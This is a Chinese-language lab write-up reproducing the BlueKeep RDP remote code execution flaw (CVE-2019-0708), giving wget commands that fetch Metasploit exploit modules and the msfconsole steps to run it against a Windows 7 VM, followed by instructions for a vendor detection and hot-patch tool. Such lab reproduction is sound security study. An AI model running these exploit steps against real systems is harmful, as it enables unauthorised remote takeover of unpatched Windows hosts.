CVE-2019-0708 遠程桌面代碼執行漏洞復現

0X00 靶機

漏洞環境,我當時就是虛擬機裝了Windows7 SP1的系統，一下就ojbk，你們沒有，就下載裝吧！
使用VM安裝Windows7 SP1模擬受害機
Windows7 SP1下載鏈接(這裏的靶機是使用清水錶哥提供的win7sp1的系統):

ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

0x01 MSF的折騰

我是**msf5 **
msfconsole...先啓動起來吧！

下載exp:

首先，我們需要下載好攻擊套件放置文件到msf的相應文件夾(如果已存在同名文件,直接覆蓋即可)

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

做如下替換（看你的msf裝在哪個目錄吧！別瞎換！）

cve_2019_0708_bluekeep_rce.rb 添加 /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

rdp.rb 替換 /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb 替換 /usr/share//metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb 替換 /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

msf啓動起來了,reload_all發現那幾個exp沒進去，需要升級msf

msfupdate

按照提示走一波

apt update
apt install metasploit-framework

最後再去執行reload就ojbk了

realod_all

0x02 漏洞利用

use exploit/rdp/cve_2019_0708_bluekeep_rce
set rhosts 192.168.1.101
set target 3
exploit

成功利用！

0x03 漏洞檢測修復工具&批量快速掃描檢測工具&熱補丁工具

（來源奇安信公衆號）

使用說明

下載頁面：
https://www.qianxin.com/other/CVE-2019-0708
使用說明：

1、 下載文件進行解壓。
2、 使用win+R快捷鍵或開始菜單選擇“運行”，輸入cmd。調起命令行工具。
3、 在命令行工具，執行命令到工具所在文件夾
4、 輸入命令對應功能，啓用熱補丁命令：QKShield.exe /enable ；禁用熱補丁命令：QKShield.exe/disable 。
5、 重啓系統後，需要重新運行命令行來啓用熱補丁

實現效果：
在工具支持的系統中啓用熱補丁後，用漏洞掃描工具掃描結果爲沒有漏洞。漏洞掃描工具下載地址：https://www.qianxin.com/other/CVE-2019-0708
支持系統：
Windows XP for 32-bit Systems Service Pack 3
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2003 for 32-bit Systems Service Pack 2
Windows Server 2003 R2 for 32-bit Systems Service Pack2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack2
Windows Server 2008 for x64-based Systems Service Pack2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems ServicePack 1
Windows Server 2008 R2 for x64-based Systems ServicePack 1 (Server Core installation)
暫不支持的系統：
Windows Server 2003 for x64-based Systems Service Pack2
Windows Server 2008 for Itanium-Based Systems ServicePack 2
Windows Server 2008 R2 for Itanium-Based SystemsService Pack 1

• 參考鏈接

http://www.nmd5.com/?p=409
https://www.qianxin.com/other/CVE-2019-0708